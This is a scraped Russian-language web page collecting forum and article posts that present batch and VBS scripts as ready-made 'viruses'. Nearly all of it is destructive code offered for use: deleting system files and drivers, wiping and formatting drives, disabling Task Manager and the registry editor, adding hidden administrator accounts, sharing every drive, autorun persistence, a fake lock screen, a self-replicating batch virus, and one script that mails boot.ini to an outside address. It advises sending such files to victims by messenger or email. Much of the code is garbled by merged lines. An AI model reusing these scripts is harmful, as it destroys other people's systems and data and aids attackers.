ГлавнаяРазноеBat скрипты

Anime Portal 1337. Bat скрипты


Простые готовые .bat вирусы (скрипты) - RSelling

Простенькие вирусы

Убирает рабочий стол

[SRC]@Echo offreg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul[/SRC]

Выключается компьютер

[SRC]@Echo offshutdown -s -t 1 -c "lol" >nul [/SRC]

Перезагрузка компьютера

[SRC]@Echo offshutdown -r -t 1 -c "lol" >nul[/SRC]

Запрещает запускать программы

[SRC]@Echo offreg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul [/SRC]

Удаление дров

[SRC]@Echo offdel "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul [/SRC]

Удаляет звуки Windows

[SRC]@Echo offdel "%SystemRoot%\Media" /q >nul[/SRC]

Запрещает заходить в панель управления

[SRC]@Echo offreg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul[/SRC]

Запрещает комбинацию Ctrl-Alt-Delete

[SRC]reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul[/SRC]

Меняет местами значение кнопок мыши

[SRC]%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul[/SRC]

Удаляет курсор мыши

[SRC]del "%SystemRoot%Cursors*.*" >nul[/SRC]

Меняет название корзины

[SRC]reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F[/SRC]

Убирает панель управления

[SRC]reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f[/SRC]

Серьезные вирусы

Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)

[SRC]rd [Буква_Диск]: /s /q[/SRC]

Удаляет все файлы в program files

[SRC]del c:Program Files/q[/SRC]

Убивает процесс explorer.exe

[SRC]taskkill /f /im explorer.exe >nul[/SRC]

Создает миллион папок

[SRC]FOR /L %%i IN (1,1,1000000) DO md %%i[/SRC]

Удаляет все драйвера, которые установлены на компьютере

[SRC]del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul[/SRC]

Удаляет команду DEL

[SRC]del %0[/SRC]

Будет открывать бесконечно Пэинт

[SRC]:xStart mspaintgoto x[/SRC]

Изменяет расширение всех ярлыков на .txt

[SRC]assoc .lnk=.txt[/SRC]

Заражает Autoexec

[SRC]copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nulreg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul [/SRC]

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)

[SRC]@Echo offchcp 1251net user SUPPORT_388945a0 /deletenet user hacker hack /addnet localgroup Администраторы hacker /addnet localgroup Пользователи SUPPORT_388945a0 /delreg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y[/SRC]

сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.

[SRC]rundll32 user,disableoemlayer[/SRC]

Меняет местами кнопки мыши,но обратная смена не возможна)

[SRC]rundll32 user,SwapMouseButton[/SRC]

Удаляет ядро системы

[SRC]del %systemroot%\system32\HAL.dll[/SRC]

Жестокие вирусы

У вашего ламера будет глючить компьютер.

[SRC]@Echo offecho Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbsecho do >> %systemdrive%\windows\system32\rundll32.vbsecho Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbsecho tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbsecho tx.close >> %systemdrive%\windows\system32\rundll32.vbsecho FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbsecho loop >> %systemdrive%\windows\system32\rundll32.vbs

start %systemdrive%\windows\system32\rundll32.vbs

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f [/SRC]

Вирус который убивает Винду. Не проверяйте на своем компьютере=)

[SRC]@Echo by хацкер.рус@Echo Autor: хацкер.рус@Echo offecho Chr(39)>%temp%\temp1.vbsecho Chr(39)>%temp%\temp2.vbsecho on error resume next > %temp%\temp.vbsecho Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbsecho set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbsreg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0copy %¶§% %SystemRoot%\user32dll.batreg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /fecho fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbsreg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /freg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /freg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /freg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /fecho fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbsecho fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbsecho fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbsecho sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbsecho fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbsecho sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbsecho fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbsecho sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbsecho fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbsecho s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbsecho s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbsecho s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbsecho on error resume next > %temp%\temp1.vbsecho set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbsecho do>>%temp%\temp1.vbsecho fso.getfile ("A:\")>>%temp%\temp1.vbsecho loop>>%temp%\temp1.vbsecho on error resume next > %temp%\temp2.vbsecho Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbsecho do>>%temp%\temp2.vbsecho execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbsecho loop>>%temp%\temp2.vbsreg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /freg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /fecho set application=createobject("shell.application")>>%temp%\temp.vbsecho application.minimizeall>>%temp%\temp.vbsreg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /fstart rundll32 user32, SwapMouseButtonreg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /fecho i=50 >> %temp%\temp.vbsecho while i^>0 or i^<0 >> %temp%\temp.vbsecho S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp%\temp.vbsecho i=i-1 >> %temp%\temp.vbsecho wend >> %temp%\temp.vbsecho do >> %temp%\temp.vbsecho wscript.sleep 200 >> %temp%\temp.vbsecho s.sendkeys"{capslock}" >> %temp%\temp.vbsecho wscript.sleep 200 >> %temp%\temp.vbsecho s.sendkeys"{numlock}" >> %temp%\temp.vbsecho wscript.sleep 200 >> %temp%\temp.vbsecho s.sendkeys"{scrolllock}" >> %temp%\temp.vbsecho loop>> %temp%\temp.vbsecho Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbsecho Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbsecho if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbsecho For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbsecho colCDROMs.Item(i).eject >> %temp%\temp.vbsecho next >> %temp%\temp.vbsecho End If >> %temp%\temp.vbsecho Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "[email protected]", "...", "Копм заражен!") >> %temp%\temp.vbsecho Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbsecho Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbsecho Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbsecho Set Flds = iConf.Fields >> %temp%\temp.vbsecho Flds.Item("

") = 2 >> %temp%\temp.vbs echo Flds.Item(" ") = 1 >> %temp%\temp.vbs echo Flds.Item(" ") = "support" >> %temp%\temp.vbs echo Flds.Item(" ") = "support" >> %temp%\temp.vbs echo Flds.Item(" ") = "smtp.mail.ru" >> %temp%\temp.vbs echo Flds.Item(" ") = 25 >> %temp%\temp.vbs echo Flds.Update >> %temp%\temp.vbs echo iMsg.Configuration = iConf >> %temp%\temp.vbs echo iMsg.To = strTo >> %temp%\temp.vbs echo iMsg.From = strFrom >> %temp%\temp.vbs echo iMsg.Subject = strSubject >> %temp%\temp.vbs echo iMsg.TextBody = strBody >> %temp%\temp.vbs echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs echo iMsg.Send >> %temp%\temp.vbs echo End Function >> %temp%\temp.vbs echo Set iMsg = Nothing >> %temp%\temp.vbs echo Set iConf = Nothing >> %temp%\temp.vbs echo Set Flds = Nothing >> %temp%\temp.vbs

echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp%\temp.vbsstart %temp%\temp.vbsstart %temp%\temp1.vbsstart %temp%\temp2.vbs[/SRC]

Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)

[SRC]@Echo offCHCP 1251clsSet Yvaga=На вашем компьютере найден вирус.Set pass=ПарольSet pas=Введите пароль.Set virus=Чтобы разблокировать ПК вам потребуется ввести парольSet dim=Выключаю вирус...title Внимание!!!CHCP 866IF EXIST C:\windows\boot.bat (goto ok )clsIF NOT EXIST C:\windows\boot.bat (ECHO Windows Registry Editor Version 5.00 >> C:\0.regECHO. >> C:\0.regECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.regECHO. >> C:\0.regECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.regstart/wait regedit -s C:\0.regdel C:\0.regECHO @Echo off >>C:\windows\boot.batECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.batECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.batECHO start sys.bat >>C:\windows\boot.batattrib +r +a +s +h C:\windows\boot.batcopy virus.bat c:\windows\sys.batattrib +r +a +s +h C:\windows\sys.batGOTO end):okclsEcho %Yvaga%echo.echo %virus%echo %pas%set /a choise = 0set /p choise=%pass%:if "%choise%" == "101" goto goldif "%choise%" == "200393" goto statusexit:statusecho %dim%attrib -r -a -s -h C:\windows\boot.batdel C:\windows\boot.batattrib -r -a -s -h C:\windows\sys.batdel C:\windows\sys.batcls:goldstart C:\:end[/SRC]

Добавляет программу в автозагрузку ОС

[SRC]copy ""%0"" "%SystemRoot%\system32\File.bat"reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /freg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f[/SRC]

Этот вирус,блокирует все программы,но интернет работает.

[SRC]@Echo offEcho Virus LoadingDate 13.09.96If exist c:ski.bat goto abcCopy %0 c:ski.batAttrib +h c:ski.batEcho c:ski.bat >>autoexec.bat:abcmd PRIDUROKmd LUZERmd DURAKmd LAMERLabel E: PRIDUROKassoc .exe=.mp3del c:Program Files/qEcho VIRUS LOAD[/SRC]

Если вы знаете еще какие-то батники то пишите в эту тему.

rselling.com

Скрипты .bat - Скрипты - Каталог статей

Команды для bat файлов и вирусов:

Удаление Системных DLL del "%SystemRoot%\system32\*.dll" /q >nul

Удалить Все драйвера del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul

Испортить boot.ini bootcfg /delete /id 1 >nul bootcfg /delete /id 1 >nul bootcfg /delete /id 1 >nul

Поменять кнопки мыши %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Запретить запуск прог

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

Сбить время time 0:00 >nul

Запретить Regedit reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul

Самоликвидация вируса del "%0" >nul

Заразить Autoexec copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul

Удалить курсоры мыши del "%SystemRoot%\Cursors\*.*" >nul

Удалить Звуки Windows del "%SystemRoot%\Media" /q >nul

Удалить обои Windows del "%SystemRoot%\Web\Wallpaper" /q >nul

Запретить Control Panel reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul

убрать рабочий стол reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключить ПК shutdown -l -t 1 -c "lol" -f >nul

прописаться в Автозагрузке(реестр) copy ""%0"" "%SystemRoot%\system32\sys32.bat" >nul reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n" /v "sys32" /t REG_SZ /d "%SystemRoot%\system32\sys32.bat" /f >nul \\ Название файла "sys32.bat"\\\\

Убить процесс explorer.exe taskkill /f /im explorer.exe >nul

Удалить файл del "%SystemRoot%\имя_файла.exe" >nul

Создать учётную запись в ПК net user "Имя_записи" /add >nul

переименовать диск С: label C:новое_название >nul

Вывод сообщения на экран с кнопкой "ОК" msg * "TEKST" >nul

Создать 1000 нумерованных, пустых папок: FOR /L %%i IN (1,1,1000) DO md %%i (кол-во папок можно изменить,изменив "1000" на другую переменную

Изменить все файлы с расширением .exe на .mp3 assoc .exe=.mp3

Изменить расширение всех ярлыков на .txt assoc .lnk=.txt

Удалить Все ярлыки del ** /q

Вывод сообщения в командной строке : "0_o?Нажмите любую клавишу для продолжения..." После нажатия любой клавиши окно закроется!!! вот код : @echo "0_o?" @pause

Форсираванная перезагрузка ПК shutdown -r -t 1 -c "lol" -f >nul

Расшарить диск C: net share "ResName"="C:" >nul

Расшариваем все диски : Код: net share disk_d=d: > nul net share disk_c=c: > nul net share disk_x=x: > nul net share disk_y=y: > nul net share disk_z=z: > nul net share disk_f=f: > nul

Запретить комбинацию клавиш Ctrl-Alt-Del reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Здесь, я приведу команды, которые необходимы Вам для использования в полной мере bat файлов:

ASSOC - Отображает или модифицирует связи расширений файлов AT - Планирует команды и программы для выполнения на компьютере. ATTRIB - Отображает или изменяет атрибуты файла. BREAK - Устанавливает или отменяет проверку комбинации [Ctrl+C]. CACLS - Отображает или модифицирует списки управления доступом (ACLs) для файлов. CALL - Вызывает один *.BAT-файл из другого. CD - Отображает имя или изменяет имя текущей директории. CHCP - Отображает или устанавливает номер активной кодовой страницы. CHDIR - Отображает имя или изменяет имя текущей директории. CHKDSK - Проверяет диск и отображает отчет о состоянии. CLS - Очищает экран. CMD - Стартует новый экземпляр интерпретатора команд Windows NT. COLOR - Устанавливает цвета по умолчанию для переднего и заднего плана консоли. COMMAND - Стартует новую копию интерпретатора команд Windows. COMP - Сравнивает содержимое двух файлов или установки файлов. COMPACT - Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS). CONVERT - Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск. COPY - Копирует один или больше файлов на другое место. CTTY - Изменяет терминальное устройство, используемое для управления вашей системой. DATE - Отображает или устанавливает дату. DEL - Удаляет один или более файлов. DEBUG - Выполняет отладку, тестирование программ и редактирование инструментальных средств. DIR - Отображает список файлов и поддиректорий в директории. DISKCOMP - Сравнивает содержимое двух дискет. DISKCOPY - Копирует содержимое одной дискеты на другую. DOSKEY - Редактирует командные строки, восстанавливает команды Windows и создает макрос. ECHO - Отображает сообщения, или включает/выключает вывод команд. EMM386 - Включает/выключает поддержку расширенной памяти EMM386. ENDLOCAL - Заканчивает локализацию изменений окружающей среды в *.BAT-файле. ERASE - Удаляет один или более файлов. EXIT - Прекращает выполнение программы (интерпретатор команд). EXTRACT - Средство извлечения информации из CAB - файлов. FC - Сравнивает два файла или установки файлов, и отображает различие между ними. FIND - Ищет текстовую строку в файле или файлах. FINDSTR - Поиск строк в файлах. FOR - Выполняет указанную команду для каждого файла в наборе файлов. FORMAT - Форматирует диск для использования с Windows. FTYPE - Отображает или модифицирует типы файлов, используемых в связях расширений. GOTO - Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле. GRAFTABL - Способность Windows отображать символы псевдографики, вставленные в графическом режиме. HELP - Обеспечивает информацию Help для команд Windows. IF - Выполняет обработку условия в *.BAT-файле. KEYB - Конфигурирует клавиатуру для заданного языка. LABEL - Создает, изменяет, или удаляет метку тома на диске. LOADHIGH(LH) - Загружает программу в верхние адреса памяти. MD - Создает директорию. MEM - Отображает величину используемой и свободной памяти в вашей системе. MKDIR - Создает директорию. MODE - Конфигурирует системное устройство. MORE - Отображает вывод одного экрана за раз. MOVE - Перемещает один или более файлов из одной директории в другую на том же диске. NETSTAT - Отображает статистики протоколов и текущих сетевых соединений TCP/IP. NLSFUNC - Загружает информацию, специфическую для страны. PATH - Отображает или устанавливает путь поиска для выполняемых файлов. PAUSE - Приостанавливает обработку *.BAT-файла и отображает сообщение. POPD - Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD. PRINT - Печатает текстовый файл. PROMPT - Изменяет подсказку к командам Windows. PUSHD - Сохраняет текущую директорию, потом изменяет. RD - Удаляет директорию. RECOVER - Восстанавливает читаемую информацию с плохого или дефектного диска. REM - Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS. REN - Переименует файл или файлы. RENAME - Переименует файл или файлы. REPLACE - Заменяет файлы. RESTORE - Восстанавливает файлы, которые были архивированы с использованием команды BACKUP. RMDIR - Удаляет директорию. SET - Отображает, устанавливает или удаляет переменные среды Windows. SETLOCAL - Начинает локализацию изменений среды в *.BAT-файле. SETVER - Устанавливает номер версии MS-DOS, который Windows сообщает программе. SHIFT - Сдвигает позицию замещаемых параметров в *.BAT-файле. SMARTDRV - Инсталлирует и конфигурирует утилиту кэширования диска SMART - драйва. SORT - Сортирует входной поток. START - Стартует отдельное окно для выполнения указанной программы или команды. SUBST - Связывает путь с литерой диска. SYS - Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск. TIME - Отображает или устанавливает системное время. TITLE - Устанавливает заголовок окна для сеанса . TREE - Графически отображает структуру директория в драйве или путь. TYPE - Отображает содержимое текстового файла. VER - Отображает версию Windows. VERIFY - Сообщает Windows, проверять ли правильность записи файлов на диск. VOL - Отображает метку дискового тома и серийный номер. XCOPY - Копирует файлы и деревья директории

Внимание!!! Все команды можно редактировать, изменять путь, переменные, названия,и.т.д.

portal.clan.su

Грохаем windows - Bat Скрипты - Каталог статей

Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл Cd C: -команда перехода на диск C где почти у всех кампах стоит виндовс Сd windows -переходим в папку Windows (у 95% ламеров и юзеров папка называется именно так) Большой минус бат файлов да и ДОСа в частности это то что нельзя удалять сразу папку с файлами, а нужно заходить в каждую папку отдельно и удалять там файлы.!!! del *.exe -удаяем все файлы с расширением .exe del *.ini -удаяем все файлы с расширением .ini del *.com -удаяем все файлы с расширением .com cd\ cd windows cd system del *.dll del *.exe После этих простеньких строчек у юзера или ламера будет примерно 30 минут работы!) Код полностью:

Cd\ Cd C: Сd windows del *.exe del *.ini del *.com cd\ cd windows cd system del *.dll del *.exe

Но вдруг папка виндовс называется не windows а например winMe, или win98, да без проблем, просто надо будет после этого кода написать ниже ещё один только чтобы папка называлась winMe и так далее.

Код полностью:

Cd\ Cd C: Сd winMe Del *.exe Del *.ini Del *.com Cd\ Cd win98 Cd system Del *.dll Del *.exe

и так далее! Как вы понимаете таким образом можно грохнуть все что угодно на чужом винте! Только помните, что такое можно делать если на машине жертвы стоит Windows 9Х!!! Люблю прикалывать ламеров, это форматирование диска С:\ Форматируем диск С:\ Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл Format C:\ -команда форматирования диска С:\ Y -команда автоматического согласие форматирование диска без ведома или подтверждения команды ламером Y -тоже самое Y -уже говорил Хе! Вот и все… Код полностью:

Cd\ Format C:\ Y Y Y

Единственный минус! Такой код может не сработать если на кампе стоит Windows ME или XP! Придется писать другой путь. В этих форточках команда форматирования лежит не просто в папке Windows, а по следующему пути C:\WINDOWS\COMMAND\format c: но само сабой форматироваться не будет, а потребует потверждение и простая команда Y Y Y не поможет, нужена другая. Просто добавим параметр /autotest

C:\WINDOWS\COMMAND\format c: /autotest

В данном случае, подтверждать ничего не придется.

Как и где это применить? Просто отсылаете бат фаил какому нибудь юзверю по аське или на мыло. При открытие файла, начнёца процесс. Так что не советую открывать фаил у себя на компе.

Если Вы залезли на удаленный компьютер то можете тоже злостно пошутить. Но как сделать так, чтобы файл запустился автоматически? Лазив по компу жертвы Вам вдруг захотелось форматнуть его винт, ну мало ли, вдруг он какой нибудь нацист или педофил! Разумеется Вы не сможите запустить файл со своего компа на компе жертвы. Но всёже есть пару вариантов. Первый, это загрузить файл в автозагрузку по пути

C:\windows (или как там будет папка называться)\Главное меню \ Программы \Автозагрузка или переименовать Ваш батик в Autoexec.bat и загрузить в корневой С:\

ЧАСТЬ 2

@Echo off copy %0 c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat

Этот вирус заражает винчестер, оставляя только один файл virus.bat. Но все-таки я бы не сказал что это полноценный вирус, т.к. он лишен возможности заражать другие компьютеры. Чтобы этот BAT-вирус обрел более четкие очертания дополним его возможностью заражать другие ПК:

@Echo off copy %0 c:virus.bat >nulecho c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul

В этом примере появляется строка, которая дает возможность вирусу заражать дискеты. Смысл этого в том что если при перезагрузке ПК в дисководе будет дискета, то она будет заражена. Конечно файл virus.bat в корневом диске C: будет сильно мозолить глаза юзеру, чтобы этого не было существует программа attrib. Преобразуем вирус:

@Echo off copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul

Если вы внимательны, то вы уже поняли, что вызов файла virus.bat в autoexec.bat будет записываться каждый раз при перезагрузке ПК. Чтобы этого не произошло есть простой способ: после записи вызова надо с помощью программы attrib установить атрибут только чтение у autoexec.bat. А есть другой вариант, он немного посложнее, но

гораздо грамотнее:

@Echo off if exist c:virus.bat goto cool copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat :cool copy %0 a:run.bat >nul

Здесь вторая строка проверяет существует ли уже файл c:virus.bat и если он уже существует, то происходит переход к метке cool. Этот способ тоже очень прост. Явный недостаток - если юзер уберет вызов из autoexec.bat, а файл virus.bat оставит, то глупый вирус будет нагло обманут. Чтобы вирус был умнее, то надо использовать программу find, если вам будет не лень с ней разбираться, то вы сможете написать более сложный BAT-вирус, который будет заражать не один

файл c:autoexec.bat, а все *.BAT.

Пример: @echo off%[MeTrA]% if '%1=='In_ goto MeTrAin if exist c:MeTrA.bat goto MeTrAru if not exist %0 goto MeTrAen find "MeTrA"<%0>c:MeTrA.bat attrib +h c:MeTrA.bat :MeTrAru for %%t in (*.bat) do call c:MeTrA In_ %%t goto MeTrAen :MeTrAin find "MeTrA"<%2>nul if not errorlevel 1 goto MeTrAen type c:MeTrA.bat>>%2

:MeTrAen

